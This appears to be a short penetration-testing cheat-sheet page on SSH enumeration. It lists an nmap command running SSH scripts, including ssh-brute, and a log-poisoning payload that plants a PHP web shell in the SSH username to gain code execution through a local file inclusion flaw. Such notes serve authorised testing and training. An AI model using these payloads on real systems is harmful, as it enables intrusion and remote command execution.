SSH Enum

SSH Enumeration


Probably not useful unless you uploaded key anywhere or found a private key file. Sometimes useful for log file poisoning with LFI.

Login and test SSH connectivity

ssh username@

SSH NMAP Scripts

nmap -sV -Pn -vv -p 22 --script ssh-auth-methods,ssh-brute,ssh-hostkey,ssh-publickey-acceptance,ssh-run,ssh2-enum-algos,sshv1

Code Execution through SSH/LFI

ssh '<?php system($_GET['cmd']); ?>'@
After this and on the LFI you have discovered just place the variable cmd:

Last updated